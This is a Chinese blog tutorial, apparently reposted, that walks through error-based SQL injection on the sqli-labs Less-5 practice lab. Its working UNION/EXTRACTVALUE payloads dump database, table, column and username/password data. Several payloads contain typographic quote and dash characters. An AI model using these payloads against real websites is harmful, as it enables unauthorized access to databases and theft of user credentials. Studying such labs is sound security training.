sqli-labs靶场第五关less-5

sqli-labs less-5

本次测试由虚拟机搭建靶场，主机浏览器中基于hackbar插件进行测试

1、确定注入点及注入类型

输入：

http://192.168.128.3/sq/Less-5/?id=1
http://192.168.128.3/sq/Less-5/?id=2

发现页面回显都一致，
输入

http://192.168.128.3/sq/Less-5/?id=1’

页面回显报错

从报错判断多了个 ’ ,确定闭合为*‘ ’* ,

2、确定列数

输入

http://192.168.128.3/sq/Less-5/?id=1’ order by 5–+
http://192.168.128.3/sq/Less-5/?id=1’ order by 4–+
http://192.168.128.3/sq/Less-5/?id=1’ order by 3–+

发现5，4都报错，3的时候页面回显与之前一致，确定由三列

3、确定回显位

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,2,3–+

无回显，结合前面出现的单引号与确定列数页面出现报错可判断出，此关可使用报错注入
本次我使用 EXTRACTVALUE() 函数进行报错注入。
函数原型

EXTRACTVALUE(xml_data, xpath_expression)

extractvalue()函数原理可参考我写的另外一篇文章
报错注入函数基础知识详解
或者另外一位博主讲的：sql注入之报错注入
使用报错注入确定回显

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,(select database()))),3–+

• 0x7e转码后为 ~ ，加入~目的是为了让后面的路径故意报错

使用了extractvalue函数，将xml数据设置为1，xpath_expression部分设置为concat(0x7e,(select database())
此时的xpath_expression为“~数据库名”，由于1中并没有“~数据库名”因此会产生报错，可以从报错结果中看到我们想要的数据库名

故此查询到数据库名

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,(select version()))),3–+

• 版本名

3、爆出所有数据库名

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))),3–+

**由此爆出了数据库名，但是由于此报错注入一次返回的字符只能由32位，这时我们可以借助substring函数
例如：select substring(123456,1,3);
输出 123
于是我们可以使用

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),1,30))),3–+

来显示从第一个字符开始的前三十个，然后使用

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),30,30))),3–+

发现还没有显示完全，接着

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),60,30))),3–+

显示完整，三次报错显示结果如下：

得到完整的数据库

4、爆出security的所有表名

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(table_name) from information_schema.tables where table_schema=database())),1,30))),3–+

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(table_name) from information_schema.tables where table_schema=database())),30,30))),3–+

得到想要的表名 users

5、爆出列名

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)),1,30))),3–+

6、爆出数据

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(username,’ ',password) from security.users)),1,30))),3–+

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(username,’ ',password) from security.users)),30,30))),3–+

剩下数据显示出来与上面同理
至此，大功告成

原文地址：https://blog.csdn.net/wanggonghanfei/article/details/142677134

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！